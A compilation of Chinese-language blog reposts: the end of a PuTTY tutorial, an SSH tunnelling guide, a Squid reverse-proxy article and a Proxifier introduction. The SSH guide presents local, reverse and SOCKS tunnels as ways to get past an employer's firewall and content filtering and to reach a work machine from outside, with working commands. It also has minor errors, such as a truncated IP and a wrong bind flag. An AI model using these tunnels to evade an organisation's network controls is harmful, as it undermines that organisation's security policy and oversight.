这是因为配置的代理服务器需要认证，而我们没有填写正确的用户名或口令。如果用户名填写的是类似 DOMAIN/username 的形式，可以尝试把 DOMAIN/ 去掉，仅仅填写 username 再试一试，还有一种可能性就是代理服务器禁止我们访问 22 目标端口。

每次开机后我都要先打开 Pagent，然后再添加我的私钥，还要输入私钥密码，太麻烦了，有没有简单一点的办法呢？

很遗憾，比较轻松的办法就是把 Pagent 和 .ppk 文件关联，然后在开始的启动项里添加一个私钥的快捷方式，这样开机后我们只需要输入一下密码就OK了。如果想把输入密码也省掉，唉唉唉，怎么比我还懒呢？如果你的私钥密码真的是很长很长，那你还是借助第三方工具吧，建议用 KeePass 吧，KeePass 可以用命令行启动省掉输入密码和选择 keyfile 的麻烦。

我希望下次登录服务器的时候，还是能看到这次登录的界面，也就是说可不可以像 Firefox 那样保存 PuTTY 登录的会话呢？

这个问题很多人都会遇到，比如在进行一个长时间的数据处理，而且还不能放到后台执行。这时是不能关闭 PuTTY 的，万一网络状况不好突然断掉，或者是自己的机器死机必须重启，那我们难道只能眼巴巴的看着就要完成的工作付之东流？
当然这些事情是可以避免的，只不过这个功能是通过 GNU Screen 来实现的。GNU Screen 是一个终端窗口管理器，只不过管理的是终端界面，也就是纯文本的界面，而非图形界面。再稍微专业一些的说法就是：用一个物理终端模拟了多个虚拟终端。
如何安装 GNU Screen 这里就不说了，单说用 PuTTY 如何方便的去使用 GNU Screen。参考一下前面提到的如何自动执行一个命令，在 Remote Command 这个里面填写如下命令：

screen -RD

然后保存会话，登录。嗯，接下来你会发现什么呢？当然是命令提示符了，然后 ls 一下，一切正常啊，GNU Screen 呢？看到了没？其实我们已经在 Gnu Screen 里面了，在有的系统上，你会看到 PuTTY 的标题已经变成了 screen，有的显示的就是主机名，不管怎样，我们已经运行在 GNU Screen 里面了。如果你发现 PuTTY 是一闪而过，没有登录上去，那估计就是 GNU Screen 没有安装成功。
在 GNU Screen 中的每一个终端窗口都有一个编号，编号从 0 开始，再创建一个终端窗口，编号就是 1 了，以此类推。
下面简述一下 GNU Screen 的最经常使用的快捷键：

关闭 GNU Screen：Ctrl+a，然后 d，下面就用 C-a d 来表示了。或者 Ctrl+a Ctrl+d，下面就用 C-a C-d 来表示。放心这个只是关闭了窗口，里面的程序还都正常的运行，下次用命令 screen -RD 又都可以看到了。
再打开一个新的终端窗口：C-a c 或者 C-a C-c
切换到下一个终端窗口：C-a n 或者 C-a C-n
切换到前一个终端窗口：C-a p 或者 C-a C-p
切换到 0 号终端窗口：C-a 0 或者 C-a C-0
切换到 8 号终端窗口：C-a 8 或者 C-a C-8
快速切换到上一个打开的终端窗口：C-a C-a。这个需要稍微解释一下，比如现在我们在第 7 号终端窗口，按快捷键 C-a 2 切换到了 2 号终端窗口。要想再回到 7 号终端窗口，一个办法就是 C-a 7，另外一个办法就是 C-a C-a。
给运行在终端窗口的程序发送 ^a：C-a a，因为 GNU Screen 的所有快捷键都是以 C-a 开始，所以要给程序发送 ^a 就是这个方法了。
黑屏：C-a -。这个作用就类似屏保了，万一有些程序不方便让别人看到，切换到其他终端窗口也不合适，那就这个了，当然创建一个新的终端窗口也可以。
滚屏：C-a [ 或者 C-a C-[ 或者 C-a esc。然后用 PageUp/PageDown 就可以翻页了，再次按下 esc 就退出滚屏模式了，这个模式也是 copy 模式，这里就不细说了。

这里只是列出了常用的操作，还有很多强大的操作以及配置，大家 man screen 吧。

PuTTY 中文教程作者：柴锋 2006年11月
Web:http://chaifeng.com
email: putty-tutorial [0x40] chaifeng [0x2E] com

Twitter: @chaifeng
Links: http://chaifeng.com/blog/2007/06/putty_200611.html , https://docs.google.com/View?docid=ajbgz6fp3pjh_2dwwwwt

更新记录

2006-11-29
初步完成想写的这些东西
2007-06-11
PuTTY 的最新版本到了0.6；修改了一下 SSH 隧道；添加了 SSH 反向隧道；添加了用 SSH 做代理服务器；
2007-09-03
补充了几个 FAQ
2008-05-04
很久没有更新过了，这次加上一个小技巧吧，如何安全、方便的使用 vnc，远程连接 vnc 不需要密码。
2008-08-12
刚刚在 lifehacker 看到 Google Docs 的几个小技巧，这篇文章终于有目录了 ^_^
2009-04-11
补充了一个 FAQ，如何保存登录的会话，下次登录还可以看到上次登录的界面。
另外，昨天刚刚从 QCon Beijing 2009 的大会现场回来，祝贺这次 QCon 大会的成功召开。
2011-07-14
新版的 PuTTY v0.61 终于在4年之后发布了，我也差不多4年没用 PuTTY 了。

版权声明

This document is licensed under a Creative Commons License.

Creative Commons Deed 署名 2.5
Creative Commons Attribution 2.5

您可自由：

复制、发行、展览、表演、放映、广播或通过信息网络传播本作品
创作演绎作品
对本作品进行商业性使用

惟须遵守下列条件：
署名. 您必须按照作者或者许可人指定的方式对作品进行署名。

对任何再使用或者发行，您都必须向他人清楚地展示本作品使用的许可协议条款。
如果得到著作权人的许可，您可以不受任何这些条件的限制。

您的合理使用以及其他权利不受上述规定的影响。

这是一份普通人可以理解的法律文本（许可协议全文）的概要。
免责声明

SSH隧道技术简介

shanyiwan@live.com() — Thu, 29 Sep 2011 01:30:54 GMT

本文的受众

如果你遇到了以下问题，那么你应该阅读这篇文章

我听说过这种技术，我对它很感兴趣
我想在家里访问我在公司的机器（写程序，查数据，下电影）。
公司为了防止我们用XX软件封锁了它的端口或者服务器地址。
公司不让我们上XX网站，限制了网址甚至IP。
公司不让我们看关于XX的信息，甚至花血本买了XX设备，能够对内容进行过滤。一看XX内容，链接就中断了。
我爸是搞电脑的，他在家里的路由器上动了手脚，我不能看XXX了。

带着这些问题，我们先从什么是ssh隧道开始。

什么是SSH隧道

首先看下面这张图，我们所面临的大部分情况都和它类似。我们的电脑在右上角，通过公司带有防火墙功能的路由器接入互联网（当然可能还有交换机什么的在中间连接着你和路由器，但是在我们的问题中交换机并不起到什么关键性的作用）。右下脚的部分是一个网站的服务器，它是我们公司防火墙策略的一部分，也就是说公司不希望我们访问这个服务器。在右上角还有一台机器，它也是属于我们的。但是这台机器并不在我们公司里面，换句话说他不受到公司防火墙的限制。最后也是最重要的一点是，我们能够在公司通过互联网直接访问这台机器。或者说这台位于公司防火墙外面的机器需要拥有一个独立的互联网IP，同时公司的防火墙规则不会屏蔽这台机器，并且这台机器运行着一个OpenSSH服务器。

现在，我们清楚地知道了自己所处的网络环境。并且不难理解我们在公司无法访问那个服务器的原因是：线路A-B-C上A-B之间的防火墙屏蔽了对那个服务器的访问。与此同时，我们也很快注意到，线路A-B-D之间、D-C之间是不受阻碍的。相信你已经想到了，在A-B之间的防火墙不会屏蔽对机器d的访问。因此我们可以通过机器d建立一个通道A-B-D-C，从而访问到机器c上的数据。

这条通道可以用很多技术来建立，这里我们仅仅介绍如何使用SSH服务器来建立这样一个通道－他被称为SSH隧道。

如何建立本地SSH隧道

在我们计划建立一个本地SSH隧道之前，我们必须清楚下面这些数据：

中间服务器d的IP地址
要访问服务器c的IP地址
要访问服务器c的端口

现在，我们把上面这张图变得具体一些，给这些机器加上IP地址。并且根据下面这张图列出我们的计划：

需要访问234.234.234.234的FTP服务，也就是端口21
中间服务器是123.123.123.123

现在我们使用下面这条命令来达成我们的目的

ssh -N -f -L 2121:234.234.234.234:21 123.123.123.123
ftp localhost:2121 # 现在访问本地2121端口，就能连接234.234.234.234的21端口了

这里我们用到了SSH客户端的三个参数，下面我们一一做出解释：

-N 告诉SSH客户端，这个连接不需要执行任何命令。仅仅做端口转发
-f 告诉SSH客户端在后台运行
-L 做本地映射端口，被冒号分割的三个部分含义分别是
- 需要使用的本地端口号
- 需要访问的目标机器IP地址（IP: 234.234.234.234）
- 需要访问的目标机器端口（端口: 21)
最后一个参数是我们用来建立隧道的中间机器的IP地址(IP: 123.123.123.123)

我们再重复一下-L参数的行为。-L X:Y:Z的含义是，将IP为Y的机器的Z端口通过中间服务器映射到本地机器的X端口。

在这条命令成功执行之后，我们已经具有绕过公司防火墙的能力，并且成功访问到了我们喜欢的一个FTP服务器了。

如何建立远程SSH隧道

通过建立本地SSH隧道，我们成功地绕过防火墙开始下载FTP上的资源了。那么当我们在家里的时候想要察看下载进度怎么办呢？大多数公司的网络是通过路由器接入互联网的，公司内部的机器不会直接与互联网连接，也就是不能通过互联网直接访问。通过线路D-B-A访问公司里的机器a便是不可能的。也许你已经注意到了，虽然D-B-A这个方向的连接不通，但是A-B-D这个方向的连接是没有问题的。那么，我们能否利用一条已经连接好的A-B-D方向的连接来完成D-B-A方向的访问呢？答案是肯定的，这就是远程SSH隧道的用途。

与本地SSH一样，我们在建立远程SSH隧道之前要清楚下面几个参数：

需要访问内部机器的远程机器的IP地址（这里是123.123.123.123）
需要让远程机器能访问的内部机器的IP地址(这里因为是想把本机映射出去，因此IP是127.0.0.1)
需要让远程机器能访问的内部机器的端口号(端口:22)

在清楚了上面的参数后，我们使用下面的命令来建立一个远程SSH隧道

ssh -N -f -R 2222:127.0.0.1:22 123.123.123.123

现在，在IP是123.123.123.123的机器上我们用下面的命令就可以登陆公司的IP是192.168.0.100的机器了。

ssh -p 2222 localhost

-N，-f 这两个参数我们已经在本地SSH隧道中介绍过了。我们现在重点说说参数-R。该参数的三个部分的含义分别是:

远程机器使用的端口（2222）
需要映射的内部机器的IP地址(127.0.0.1)
需要映射的内部机器的端口(22)

例如：-R X:Y:Z 就是把我们内部的Y机器的Z端口映射到远程机器的X端口上。

建立SSH隧道的几个技巧

自动重连

隧道可能因为某些原因断开，例如：机器重启，长时间没有数据通信而被路由器切断等等。因此我们可以用程序控制隧道的重新连接，例如一个简单的循环或者使用 djb’s daemontools . 不管用哪种方法，重连时都应避免因输入密码而卡死程序。关于如何安全的避免输入密码的方法，请参考我的如何实现安全的免密码ssh登录。这里请注意，如果通过其他程序控制隧道连接，应当避免将SSH客户端放到后台执行，也就是去掉-f参数。

保持长时间连接

有些路由器会把长时间没有通信的连接断开。SSH客户端的TCPKeepAlive选项可以避免这个问题的发生，默认情况下它是被开启的。如果它被关闭了，可以在ssh的命令上加上-o TCPKeepAlive=yes来开启。

另一种方法是，去掉-N参数，加入一个定期能产生输出的命令。例如: top或者vmstat。下面给出一个这种方法的例子：

ssh -R 2222:localhost:22 123.123.123.123 "vmstat 30"

检查隧道状态

有些时候隧道会因为一些原因通信不畅而卡死，例如：由于传输数据量太大，被路由器带入stalled状态。这种时候，往往SSH客户端并不退出，而是卡死在那里。一种应对方法是，使用SSH客户端的ServerAliveInterval和ServerAliveCountMax选项。ServerAliveInterval会在隧道无通信后的一段设置好的时间后发送一个请求给服务器要求服务器响应。如果服务器在ServerAliveCountMax次请求后都没能响应，那么SSH客户端就自动断开连接并退出，将控制权交给你的监控程序。这两个选项的设置方法分别是在ssh时加入-o ServerAliveInterval=n和-o ServerAliveCountMax=m。其中n, m可以自行定义。

如何将端口绑定到外部地址上

使用上面的方法，映射的端口只能绑定在127.0.0.1这个接口上。也就是说，只能被本机自己访问到。如何才能让其他机器访问这个端口呢？我们可以把这个映射的端口绑定在0.0.0.0的接口上，方法是加上参数-b 0.0.0.0。同时还需要打开SSH服务器端的一个选项－GatewayPorts。默认情况下它应当是被打开的。如果被关闭的话，可以在/etc/sshd_config中修改GatewayPorts no为GatewayPorts yes来打开它。

如何寻找中间服务器

如果你家里使用ADSL上网，多半你会比较幸运。一般的ADSL（例如联通的ADSL）都是有互联网地址的。你只需要在家里的路由器上一台装有OpenSSH server机器的SSH端口映射出去即可。同时一些提供SSH访问的虚拟主机也可以用于这一用途。例如： Hostmonser 或者 Dreamhost .

通过SSH隧道建立SOCKS服务器

如果我们需要借助一台中间服务器访问很多资源，一个个映射显然不是高明的办法（事实上，高明确实没有用这个方法）。幸好，SSH客户端为我们提供了通过SSH隧道建立SOCKS服务器的功能。

通过下面的命令我们可以建立一个通过123.123.123.123的SOCKS服务器。

ssh -N -f -D 1080 123.123.123 # 将端口绑定在127.0.0.1上
ssh -N -f -D 0.0.0.0:1080 123.123.123.123 # 将端口绑定在0.0.0.0上

通过SSH建立的SOCKS服务器使用的是SOCKS5协议，在为应用程序设置SOCKS代理的时候要特别注意。

总结

至此，我们已经对如何利用SSH隧道有一个基本的认识了。现在，文章开始时的那些问题应该迎刃而解了吧。这里要特别说一下，由于SSH隧道也使用了SSH加密协议，因此是不会被防火墙上的内容过滤器监控到的。也就是说一切在隧道中传输的数据都是被加密的。当然，离开隧道后的数据还是会保持自己原有的样子，没有加密的数据还是会被后续的路由设备监控到。

参考文献

OpenSSH网站

利用 squid 反向代理提高网站性能

shanyiwan@live.com() — Mon, 05 Sep 2011 01:21:15 GMT

本文在介绍 squid 反向代理的工作原理的基础上，指出反向代理技术在提高网站访问速度，增强网站可用性、安全性方面有很好的用途。作者在具体的实验环境下，利用 DNS 轮询和 Squid 反向代理技术，实现了网站的负载均衡，从而提高了网站的可用性和可靠性。

现在有许多大型的门户网站如 SINA 都采用 squid 反向代理技术来加速网站的访问速度，可将不同的 URL 请求分发到后台不同的 WEB 服务器上，同时互联网用户只能看到反向代理服务器的地址，加强了网站的访问安全。

反向代理的概念

反向代理服务器又称为 WEB 加速服务器，它位于 WEB 服务器的前端，充当 WEB 服

务器的内容缓存器。其系统结构如图 1

图 1. 系统结构

反向代理服务器是针对 WEB 服务器设置的，后台 WEB 服务器对互联网用户是透明的，用户只能看到反向代理服务器的地址，不清楚后台 WEB 服务器是如何组织架构的。当互联网用户请求 WEB 服务时，DNS 将请求的域名解析为反向代理服务器的 IP 地址，这样 URL 请求将被发送到反向代理服务器，由反向代理服务器负责处理用户的请求与应答、与后台 WEB 服务器交互。利用反向代理服务器减轻了后台 WEB 服务器的负载，提高了访问速度，同时避免了因用户直接与 WEB 服务器通信带来的安全隐患。

Squid 反向代理的实现原理

目前有许多反向代理软件，比较有名的有 Nginx 和 Squid 。 Nginx 是由 Igor Sysoev 为俄罗斯访问量第二的 Rambler.ru 站点开发的，是一个高性能的 HTTP 和反向代理服务器，也是一个 IMAP/POP3/SMTP 代理服务器。

Squid是由美国政府大力资助的一项研究计划，其目的为解决网络带宽不足的问题，支持HTTP，HTTPS，FTP 等多种协议，是现在 Unix 系统上使用、最多功能也最完整的一套软体。下面将重点介绍 Squid 反向代理的实现原理和在提高网站性能方面的应用。

Squid反向代理服务器位于本地 WEB 服务器和 Internet 之间 , 组织架构如图 2：

图 2. 组织架构

客户端请求访问 WEB 服务时，DNS 将访问的域名解析为 Squid 反向代理服务器的 IP 地址，这样客户端的 URL 请求将被发送到反向代理服务器。如果 Squid 反向代理服务器中缓存了该请求的资源，则将该请求的资源直接返回给客户端，否则反向代理服务器将向后台的 WEB 服务器请求资源，然后将请求的应答返回给客户端，同时也将该应答缓存在本地，供下一个请求者使用。

Squid 反向代理一般只缓存可缓冲的数据（比如 html 网页和图片等），而一些 CGI 脚本程序或者 ASP、JSP 之类的动态程序默认不缓存。它根据从 WEB 服务器返回的 HTTP 头标记来缓冲静态页面。有四个最重要 HTTP 头标记：

Last-Modified: 告诉反向代理页面什么时间被修改
Expires: 告诉反向代理页面什么时间应该从缓冲区中删除
Cache-Control: 告诉反向代理页面是否应该被缓冲
Pragma: 用来包含实现特定的指令，最常用的是 Pragma:no-cache

利用 Squid 反向代理加速网站实例

本实例的域名是 wenjin.cache.ibm.com.cn，通过DNS的轮询技术，将客户端的请求分发给其中一台 Squid 反向代理服务器处理，如果这台 Squid 缓存了用户的请求资源，则将请求的资源直接返回给用户，否则这台 Squid 将没有缓存的请求根据配置的规则发送给邻居 Squid 和后台的 WEB 服务器处理，这样既减轻后台 WEB 服务器的负载，又提高整个网站的性能和安全性。该系统结构图 3 如下：

图 3. 系统结构

配置的系统环境：

一台 DNS 服务器：操作系统 Freebsd，软件 BIND 9.5，IP 192.168.76.222 ；
三台 Squid 服务器：操作系统 Linux AS 4，软件 Squid 3.0，相应的 IP 如下：

Squid1：192.168.76.223 
 Squid2：192.168.76.224 
 Squid3：192.168.76.225

三台 WEB 服务器：操作系统 Linux AS 4，应用软件 Tomcat 5.0+Mysql，相应的 IP 地址如下：

webServer1：210.82.118.195 
 webServer2：192.168.76.226 
 webServer1：192.168.76.227

应用软件的安装和配置

配置 DNS 服务器

软件利用 Freebsd 自带的 bind 9.5 。然后针对该系统配置 bind，首先修改 bind 的配置文件 /etc/namedb/named.conf，在文件中添加

zone "cache.ibm.com.cn"{ 
        type master; 
        file "master/ cache.ibm.com.cn "; 
 };

再在 /etc/namedb/master 目录下添加 cache.ibm.com.cn 文件，该文件的内容如下：

$TTL    3600 
 @       IN      SOA     search. ibm.com.cn. root. ibm.com.cn.  ( 
                                20080807        ; Serial 
                                3600    ; Refresh 
                                900     ; Retry 
                                3600000 ; Expire 
                                3600 )  ; Minimum 
        IN      NS      search.ibm.com.cn. 
 1       IN      PTR     localhost.ibm.com.cn. 
 wenjin  IN      A       192.168.76.223 
 wenjin  IN      A       192.168.76.224 
 wenjin  IN      A       192.168.76.225

这样当用户请求的时候，DNS 通过轮询机制将 wenjin.cache.ibm.com.cn 的域名解析为 192.168.76.223、192.168.76.224 和 192.168.76.225 其中之一。

配置完成后，运行 rndc star t 启动 bind 服务。可在 /etc/rc.conf 中设置 named_enable="YES" 使得开机自启动。

用 ps – A |grep named 查看 bind 服务是否起来；

用 nslookup wenjin.cache.ibm.com.cn 测试 bind 服务是否正常运行。

配置 Squid1 服务器

下载 squid-3.0.STABLE8.tar.gz 源码包，将其放在 /home 目录下
解压缩tar – zxvf squid-3.0.STABLE8.tar.gz
设置配置参数：cd squid-3.0.STABLE10
./configure – prefix=/usr/local/squid
将 squid 安装在 /usr/local 目录下
编译安装：make&make install安装完以后会在 /usr/local 目录下看见 squid 目录。

配置 squid 配置文件

编辑 squid.conf 文件，vi /usr/local/squid/etc/squid.conf

cache_effective_user squid 
 cache_effective_group squid 
 ######### 设定 squid 的主机名 , 如无此项 squid 将无法启动
 visible_hostname squid1.nlc.gov.cn 
 ############# 配置 squid 为加速模式 ################# 
 http_port 80 accel vhost vport 
 icp_port 3130 
 ##### 配置 squid2、squid3 为其邻居，当 squid1 在其缓存中没有找到请求的资源时，
          通过 ICP 查询去其邻居中取得缓存
 cache_peer squid2.ibm.com.cn sibling 80 3130 
 cache_peer squid3.ibm.com.cn sibling 80 3130 
 ##### squid1 的三个父节点，originserver 参数指明是源服务器，
 round-robin  参数指明 squid 通过轮询方式将请求分发到其中一台父节点；
 squid 同时会对这些父节点的健康状态进行检查，如果父节点 down 了，
那么 squid 会从剩余的 origin 服务器中抓取数据
 cache_peer 210.82.118.195 parent 8080 0 no-query originserver round-robin \ 
                                              name=webServer1 
 cache_peer 192.168.76.226 parent 8080 0 no-query originserver round-robin \ 
                                              name=webServer2 
 cache_peer 192.168.76.227 parent 8080 0 no-query originserver round-robin \ 
                                            name=webServer3 
 #### 将 wenjin.cache.ibm.com.cn 域的请求通过 RR 轮询方式转发到三个父节点中的一个
 cache_peer_domain webServer1 webServer2 webServer3 wenjin.cache.ibm.com.cn 
 ##### 下面是一些访问控制、日志和缓存目录的设置
 acl localnet src 192.168.76.223 192.168.76.224 192.168.76.225 
 acl all src 0.0.0.0/0.0.0.0 
 http_access allow all 
 icp_access allow localnet 
 cache_log /usr/local/squid/var/logs/cache.log 
 access_log /usr/local/squid/var/logs/access.log squid 
 cache_dir ufs /usr/local/squid/var/cache/ 1000 16 256 
 ####### 对 squid 的一些优化 ############### 
 maximum_object_size 10240 KB  ### 能缓存的最大对象为 10M 
 maximum_object_size_in_memory 512 KB ### 内存中缓存的最大对象 512K 
 cache_mem 256 MB  ###squid 用于缓存的内存量

保存后 :wq 退出。

在 /etc/hosts 文件中添加

192.168.76.223  squid1.ibm.com.cn 
 192.168.76.224  squid2.ibm.com.cn 
 192.168.76.225  squid3.ibm.com.cn

保存后 : wq 退出。

检查 squid 配置文件正确与否：/usr/local/squid/bin/squid – k parse

生成缓存目录/usr/local/squid/bin/squid – z

启动squid：/usr/local/squid/bin/squid

配置 squid2 和 squid3 服务器

squid2 和 squid3 服务器的配置方法和配置参数和 squid1 一样，配置完成后，分别启动这两个服务器上的 squid 服务。

在 squid 的日志文件 cache.log 中，出现如下日志信息则说明三台 squid 之间成功配置为 sibling，且配置了三个父代理。

2008/11/17 10:08:47| Configuring Sibling squid1.ibm.com.cn/80/3130 
 2008/11/17 10:08:47| Configuring Sibling squid3.ibm.com.cn/80/3130 
 2008/11/17 10:08:47| Configuring Parent 210.82.118.195/8080/0 
 2008/11/17 10:08:47| Configuring Parent 192.168.76.226/8080/0 
 2008/11/17 10:08:47| Configuring Parent 192.168.76.227/8080/0 
 2008/11/17 10:08:47| Ready to serve requests.

测试

测试之前，保证 DNS 服务、三台 squid 服务和三台 web 服务都正常起来。在客户端输入http://wenjin.cache.ibm.com.cn，则正确的显示该网页。服务器端的响应对客户端是透明的，客户端不知道请求是由哪台 WEB 服务器处理的；而且其中某台 Squid 服务器或 WEB 服务器发生故障，也不影响服务的正常运行。

总结

Squid 是一个开源的软件，利用它的反向代理技术可以提高网站系统的访问速度。本文在真实的网络环境下，利用三台 squid 反向代理服务器加速了网站的性能，同时结合 DNS 轮询技术实现了网站的负载均衡。经过一段时间的测试和试运行，该网站的访问速度和可用性方面都有很大的提高，从未出现过网站服务中断情况。

关于作者

李明慧，在 IBM 中国软件开发中心 BI 团队工作从事 InfoSphere Warehouse Administration Console 的功能测试工作。曾在 DeveloperWorks 发表《将 DB2 DWE 9.1.X 迁移到 DB2 Warehouse 9.5》、《 InfoSphere Warehouse SQL 仓储命令行接口》以及《Linux下利用 squid 反向代理提高网站性能》等文章。

proxifier

shanyiwan@live.com() — Thu, 25 Aug 2011 10:16:57 GMT

概念

　　Proxifier是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。支持 64位系统，支持Xp，Vista，Win7，支持socks4，socks5，http代理协议，支持TCP，UDP协议，可以指定端口，指定IP，指定程序等运行模式，兼容性非常好。有点类似SOCKSCAP。

作用

　　有许多网络应用程序不支持通过代理服务器工作，因此不能用于局域网或防火墙后面。这些会损害公司的隐私和导致很多限制。Proxifier解决了这些问题和所有限制，让您有机会不受任何限制使用你喜爱的软件。此外，它让你获得了额外的网络安全控制，创建代理隧道，并添加使用更多网络功能的权力。

配置

　　1、添加代理：

　　运行软件，打开软件主界面。选择option–>proxy setting,点击右侧的Add添加代理，在弹出的窗口中添加你的代理。如果你的代理需要验证，在setting部分填入用户名和密码。添加完成后可以检查代理的可用性。

　　2、设置代理规则

　　运行软件，打开软件主界面。选择option–>proxification Rules,在打开的窗口中选择哪些软件使用该代理访问网络，默认是全部软件都通过该代理访问网络，对于本机localhost的访问除外。